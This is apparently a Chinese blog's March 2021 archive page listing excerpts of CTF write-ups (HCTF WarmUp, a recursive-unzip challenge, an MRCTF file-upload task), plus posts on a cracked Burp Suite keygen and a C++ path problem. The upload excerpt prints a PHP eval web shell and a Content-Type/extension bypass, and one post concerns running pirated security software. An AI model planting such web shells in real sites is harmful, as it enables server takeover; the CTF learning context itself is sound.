03 2021 档案

摘要:web [HCTF 2018]WarmUp 打开开发者模式,发现有个source.php 访问一下 还有个hint.php,也访问一下 还是来审计一下source.php的代码: 如果参数page已经设置且page为字符串,满足条件,第一个if语句不执行 如果page的值在白名单中,执行第二个if语 阅读全文
posted @ 2021-03-29 23:42 Arctic_Maple 阅读(367) 评论(0) 推荐(0)
摘要:#CheckIn 文件是压缩包,打开就是flag压缩包,再打开还是flag压缩包,所以是解压3000个flag压缩包 网上找到的递归解压脚本 import shutil import zipfile import os import win32api recursive_unzip_file = [ 阅读全文
posted @ 2021-03-26 23:22 Arctic_Maple 阅读(70) 评论(0) 推荐(0)
摘要:Burpsuite又炸了,今天一打开就要我重新输入密钥,加上本来我初次安装的时候就出现了打不开.jar文件的情况,今天彻底研究一下好了 还是老问题,双击打不开burp-loader-keygen.jar文件 之前我的Java版本是14.0.2,但是好像破解文件是不支持太高版本的java的,就下了Ja 阅读全文
posted @ 2021-03-09 11:40 Arctic_Maple 阅读(390) 评论(0) 推荐(0)
摘要:题目 【Buuctf】[MRCTF2020]你传你🐎呢 文件上传,那就传个一句话木马 最基础的代码,新建一个php文件,写入 <?php @eval($_POST['attack']) ?> 抓包 修改文件后缀为jpg,更改Content-Type为image/jpeg 传入的是jpg文件,我们需 阅读全文
posted @ 2021-03-07 23:32 Arctic_Maple 阅读(3579) 评论(0) 推荐(0)
摘要:关于C/C++路径不能有中文 昨天下午安装C++环境的时候出了点问题 查了一下,是路径有中文,但是我建的文件夹在桌面上,放到D盘的时候运行又没能调出cmd,只有build。 思来想去决定改账户名称(我账户在买电脑装Win10的时候写的中文,难免以后还会出现路径中文问题)。 然后就发现文件夹名字改不了 阅读全文
posted @ 2021-03-05 23:41 Arctic_Maple 阅读(2484) 评论(1) 推荐(0)